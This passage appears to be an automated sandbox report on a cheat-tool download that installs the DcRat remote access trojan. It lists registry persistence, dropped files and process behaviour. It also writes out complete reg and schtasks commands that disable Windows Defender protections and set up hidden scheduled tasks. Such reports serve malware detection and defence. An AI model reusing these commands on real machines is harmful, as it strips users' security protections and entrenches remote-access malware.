Player\\taskhostw.exe\"" portrefNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\blockweb\\smss.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Windows\\Vss\\services.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\WindowsRE\\dllhost.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files\\Windows Portable Devices\\lsass.exe\"" portrefNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Filters\\csrss.exe\"" portrefNet.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 23 ip-api.com -
Modifies Security services 2 TTPs 4 IoCs
Modifies the startup behavior of a security service.
Processes:
reg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
Lunch LaCheatV2.exeLunch LaCheat.exepid process 2468 Lunch LaCheatV2.exe 3092 Lunch LaCheat.exe -
Drops file in Program Files directory 11 IoCs
Processes:
portrefNet.exeportrefNet.exedescription ioc process File created C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ea9f0e6c9e2dcd portrefNet.exe File created C:\Program Files\Windows Media Player\ea9f0e6c9e2dcd portrefNet.exe File created C:\Program Files\Windows Portable Devices\lsass.exe portrefNet.exe File created C:\Program Files (x86)\Common Files\Microsoft Shared\Filters\csrss.exe portrefNet.exe File created C:\Program Files (x86)\Common Files\Microsoft Shared\Filters\886983d96e3d3e portrefNet.exe File created C:\Program Files\Google\Chrome\Application\csrss.exe portrefNet.exe File created C:\Program Files (x86)\Windows Photo Viewer\ja-JP\taskhostw.exe portrefNet.exe File created C:\Program Files\Windows Media Player\taskhostw.exe portrefNet.exe File opened for modification C:\Program Files\Windows Media Player\taskhostw.exe portrefNet.exe File created C:\Program Files\Windows Portable Devices\6203df4a6bafc7 portrefNet.exe File created C:\Program Files\Google\Chrome\Application\886983d96e3d3e portrefNet.exe -
Drops file in Windows directory 7 IoCs
Processes:
portrefNet.exeportrefNet.exedescription ioc process File created C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\55b276f4edf653 portrefNet.exe File created C:\Windows\Vss\services.exe portrefNet.exe File created C:\Windows\Vss\c5b4cb5e9653cc portrefNet.exe File created C:\Windows\Speech_OneCore\smss.exe portrefNet.exe File created C:\Windows\Speech_OneCore\69ddcba757bf72 portrefNet.exe File created C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\StartMenuExperienceHost.exe portrefNet.exe File opened for modification C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\StartMenuExperienceHost.exe portrefNet.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 38 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
reg.exereg.exereg.exereg.exereg.exeschtasks.exereg.exeWScript.exereg.exereg.exereg.exeschtasks.execmd.exeLunch LaCheatV2.exereg.exereg.exereg.exeWScript.exeBBD6FFDB33259778F08704696A04891F.exereg.exereg.exeDCRatBuild.exereg.exeschtasks.exereg.exereg.exereg.exeLunch LaCheat.exereg.exereg.exeschtasks.exereg.exereg.exereg.execmd.exereg.exereg.exeschtasks.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Lunch LaCheatV2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BBD6FFDB33259778F08704696A04891F.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DCRatBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Lunch LaCheat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Modifies registry class 1 IoCs
Processes:
DCRatBuild.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings DCRatBuild.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 48 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3204 schtasks.exe 872 schtasks.exe 3944 schtasks.exe 2064 schtasks.exe 4852 schtasks.exe 552 schtasks.exe 4180 schtasks.exe 3184 schtasks.exe 4452 schtasks.exe 2576 schtasks.exe 4620 schtasks.exe 1904 schtasks.exe 924 schtasks.exe 2336 schtasks.exe 4904 schtasks.exe 4404 schtasks.exe 1096 schtasks.exe 2756 schtasks.exe 1044 schtasks.exe 984 schtasks.exe 956 schtasks.exe 4424 schtasks.exe 3036 schtasks.exe 208 schtasks.exe 3748 schtasks.exe 3952 schtasks.exe 556 schtasks.exe 432 schtasks.exe 4744 schtasks.exe 1172 schtasks.exe 4748 schtasks.exe 3480 schtasks.exe 1056 schtasks.exe 3220 schtasks.exe 4504 schtasks.exe 4552 schtasks.exe 3472 schtasks.exe 2752 schtasks.exe 456 schtasks.exe 3852 schtasks.exe 2996 schtasks.exe 2164 schtasks.exe 548 schtasks.exe 4460 schtasks.exe 2148 schtasks.exe 2608 schtasks.exe 4924 schtasks.exe 2648 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
Lunch LaCheatV2.exeLunch LaCheat.exeportrefNet.exeportrefNet.exedllhost.exepid process 2468 Lunch LaCheatV2.exe 2468 Lunch LaCheatV2.exe 2468 Lunch LaCheatV2.exe 2468 Lunch LaCheatV2.exe 3092 Lunch LaCheat.exe 3092 Lunch LaCheat.exe 3092 Lunch LaCheat.exe 3092 Lunch LaCheat.exe 4016 portrefNet.exe 1740 portrefNet.exe 1740 portrefNet.exe 1740 portrefNet.exe 2636 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
52cheatand52rat.exewmic.exeportrefNet.exeportrefNet.exedllhost.exedescription pid process Token: SeDebugPrivilege 4508 52cheatand52rat.exe Token: SeIncreaseQuotaPrivilege 4428 wmic.exe Token: SeSecurityPrivilege 4428 wmic.exe Token: SeTakeOwnershipPrivilege 4428 wmic.exe Token: SeLoadDriverPrivilege 4428 wmic.exe Token: SeSystemProfilePrivilege 4428 wmic.exe Token: SeSystemtimePrivilege 4428 wmic.exe Token: SeProfSingleProcessPrivilege 4428 wmic.exe Token: SeIncBasePriorityPrivilege 4428 wmic.exe Token: SeCreatePagefilePrivilege 4428 wmic.exe Token: SeBackupPrivilege 4428 wmic.exe Token: SeRestorePrivilege 4428 wmic.exe Token: SeShutdownPrivilege 4428 wmic.exe Token: SeDebugPrivilege 4428 wmic.exe Token: SeSystemEnvironmentPrivilege 4428 wmic.exe Token: SeRemoteShutdownPrivilege 4428 wmic.exe Token: SeUndockPrivilege 4428 wmic.exe Token: SeManageVolumePrivilege 4428 wmic.exe Token: 33 4428 wmic.exe Token: 34 4428 wmic.exe Token: 35 4428 wmic.exe Token: 36 4428 wmic.exe Token: SeIncreaseQuotaPrivilege 4428 wmic.exe Token: SeSecurityPrivilege 4428 wmic.exe Token: SeTakeOwnershipPrivilege 4428 wmic.exe Token: SeLoadDriverPrivilege 4428 wmic.exe Token: SeSystemProfilePrivilege 4428 wmic.exe Token: SeSystemtimePrivilege 4428 wmic.exe Token: SeProfSingleProcessPrivilege 4428 wmic.exe Token: SeIncBasePriorityPrivilege 4428 wmic.exe Token: SeCreatePagefilePrivilege 4428 wmic.exe Token: SeBackupPrivilege 4428 wmic.exe Token: SeRestorePrivilege 4428 wmic.exe Token: SeShutdownPrivilege 4428 wmic.exe Token: SeDebugPrivilege 4428 wmic.exe Token: SeSystemEnvironmentPrivilege 4428 wmic.exe Token: SeRemoteShutdownPrivilege 4428 wmic.exe Token: SeUndockPrivilege 4428 wmic.exe Token: SeManageVolumePrivilege 4428 wmic.exe Token: 33 4428 wmic.exe Token: 34 4428 wmic.exe Token: 35 4428 wmic.exe Token: 36 4428 wmic.exe Token: SeDebugPrivilege 4016 portrefNet.exe Token: SeDebugPrivilege 1740 portrefNet.exe Token: SeDebugPrivilege 2636 dllhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
BBD6FFDB33259778F08704696A04891F.execmd.exedescription pid process target process PID 4964 wrote to memory of 2468 4964 BBD6FFDB33259778F08704696A04891F.exe Lunch LaCheatV2.exe PID 4964 wrote to memory of 2468 4964 BBD6FFDB33259778F08704696A04891F.exe Lunch LaCheatV2.exe PID 4964 wrote to memory of 2468 4964 BBD6FFDB33259778F08704696A04891F.exe Lunch LaCheatV2.exe PID 4964 wrote to memory of 3460 4964 BBD6FFDB33259778F08704696A04891F.exe cmd.exe PID 4964 wrote to memory of 3460 4964 BBD6FFDB33259778F08704696A04891F.exe cmd.exe PID 4964 wrote to memory of 3460 4964 BBD6FFDB33259778F08704696A04891F.exe cmd.exe PID 3460 wrote to memory of 4288 3460 cmd.exe reg.exe PID 3460 wrote to memory of 4288 3460 cmd.exe reg.exe PID 3460 wrote to memory of 4288 3460 cmd.exe reg.exe PID 3460 wrote to memory of 3384 3460 cmd.exe reg.exe PID 3460 wrote to memory of 3384 3460 cmd.exe reg.exe PID 3460 wrote to memory of 3384 3460 cmd.exe reg.exe PID 3460 wrote to memory of 2452 3460 cmd.exe reg.exe PID 3460 wrote to memory of 2452 3460 cmd.exe reg.exe PID 3460 wrote to memory of 2452 3460 cmd.exe reg.exe PID 3460 wrote to memory of 3516 3460 cmd.exe reg.exe PID 3460 wrote to memory of 3516 3460 cmd.exe reg.exe PID 3460 wrote to memory of 3516 3460 cmd.exe reg.exe PID 3460 wrote to memory of 2848 3460 cmd.exe reg.exe PID 3460 wrote to memory of 2848 3460 cmd.exe reg.exe PID 3460 wrote to memory of 2848 3460 cmd.exe reg.exe PID 3460 wrote to memory of 736 3460 cmd.exe reg.exe PID 3460 wrote to memory of 736 3460 cmd.exe reg.exe PID 3460 wrote to memory of 736 3460 cmd.exe reg.exe PID 3460 wrote to memory of 5040 3460 cmd.exe reg.exe PID 3460 wrote to memory of 5040 3460 cmd.exe reg.exe PID 3460 wrote to memory of 5040 3460 cmd.exe reg.exe PID 3460 wrote to memory of 2476 3460 cmd.exe reg.exe PID 3460 wrote to memory of 2476 3460 cmd.exe reg.exe PID 3460 wrote to memory of 2476 3460 cmd.exe reg.exe PID 3460 wrote to memory of 3980 3460 cmd.exe reg.exe PID 3460 wrote to memory of 3980 3460 cmd.exe reg.exe PID 3460 wrote to memory of 3980 3460 cmd.exe reg.exe PID 3460 wrote to memory of 628 3460 cmd.exe reg.exe PID 3460 wrote to memory of 628 3460 cmd.exe reg.exe PID 3460 wrote to memory of 628 3460 cmd.exe reg.exe PID 3460 wrote to memory of 3608 3460 cmd.exe reg.exe PID 3460 wrote to memory of 3608 3460 cmd.exe reg.exe PID 3460 wrote to memory of 3608 3460 cmd.exe reg.exe PID 3460 wrote to memory of 1784 3460 cmd.exe reg.exe PID 3460 wrote to memory of 1784 3460 cmd.exe reg.exe PID 3460 wrote to memory of 1784 3460 cmd.exe reg.exe PID 3460 wrote to memory of 1152 3460 cmd.exe reg.exe PID 3460 wrote to memory of 1152 3460 cmd.exe reg.exe PID 3460 wrote to memory of 1152 3460 cmd.exe reg.exe PID 3460 wrote to memory of 4292 3460 cmd.exe reg.exe PID 3460 wrote to memory of 4292 3460 cmd.exe reg.exe PID 3460 wrote to memory of 4292 3460 cmd.exe reg.exe PID 3460 wrote to memory of 4732 3460 cmd.exe reg.exe PID 3460 wrote to memory of 4732 3460 cmd.exe reg.exe PID 3460 wrote to memory of 4732 3460 cmd.exe reg.exe PID 3460 wrote to memory of 1632 3460 cmd.exe schtasks.exe PID 3460 wrote to memory of 1632 3460 cmd.exe schtasks.exe PID 3460 wrote to memory of 1632 3460 cmd.exe schtasks.exe PID 3460 wrote to memory of 3148 3460 cmd.exe schtasks.exe PID 3460 wrote to memory of 3148 3460 cmd.exe schtasks.exe PID 3460 wrote to memory of 3148 3460 cmd.exe schtasks.exe PID 3460 wrote to memory of 4120 3460 cmd.exe schtasks.exe PID 3460 wrote to memory of 4120 3460 cmd.exe schtasks.exe PID 3460 wrote to memory of 4120 3460 cmd.exe schtasks.exe PID 3460 wrote to memory of 1856 3460 cmd.exe schtasks.exe PID 3460 wrote to memory of 1856 3460 cmd.exe schtasks.exe PID 3460 wrote to memory of 1856 3460 cmd.exe schtasks.exe PID 3460 wrote to memory of 2248 3460 cmd.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\BBD6FFDB33259778F08704696A04891F.exe"C:\Users\Admin\AppData\Local\Temp\BBD6FFDB33259778F08704696A04891F.exe"1⤵
- DcRat
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Users\Admin\AppData\Local\Temp\Lunch LaCheatV2.exe"C:\Users\Admin\AppData\Local\Temp\Lunch LaCheatV2.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2468 -
C:\Users\Admin\AppData\Local\Temp\Lunch LaCheat.exe"C:\Users\Admin\AppData\Local\Temp\Lunch LaCheat.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3092 -
C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3852 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2660 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\blockweb\TOdra8QNG4wQEWkSimCHh9eVG.bat" "6⤵
- System Location Discovery: System Language Discovery
PID:2248 -
C:\blockweb\portrefNet.exe"C:\blockweb\portrefNet.exe"7⤵
- DcRat
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4016 -
C:\blockweb\portrefNet.exe"C:\blockweb\portrefNet.exe"8⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1740 -
C:\Recovery\WindowsRE\dllhost.exe"C:\Recovery\WindowsRE\dllhost.exe"9⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\blockweb\file.vbs"5⤵
- System Location Discovery: System Language Discovery
PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\52cheatand52rat.exe"C:\Users\Admin\AppData\Local\Temp\52cheatand52rat.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4508 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4428
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\windows defender.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵
- System Location Discovery: System Language Discovery
PID:4288
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:3384
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:2452
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:3516
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2848
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:736
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:5040
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2476
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:3980
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:628
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:3608
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:1784
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵
- System Location Discovery: System Language Discovery
PID:1152
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:4292
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵
- System Location Discovery: System Language Discovery
PID:4732
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:1632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:3148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:4120
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:1856
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵
- System Location Discovery: System Language Discovery
PID:2248
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵
- System Location Discovery: System Language Discovery
PID:5096
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵
- System Location Discovery: System Language Discovery
PID:3892
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵
- System Location Discovery: System Language Discovery
PID:4084
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵
- System Location Discovery: System Language Discovery
PID:2204
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵
- System Location Discovery: System Language Discovery
PID:2336
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1380
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:552
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:4904
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:5028
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
- System Location Discovery: System Language Discovery
PID:3476
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\StartMenuExperienceHost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2752
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2336
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Windows\assembly\GAC_64\srmlib\1.0.0.0__31bf3856ad364e35\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3480
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\taskhostw.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2996
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\taskhostw.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2608
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\taskhostw.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Favorites\MoUsoCoreWorker.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4904
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Users\Admin\Favorites\MoUsoCoreWorker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4180
-
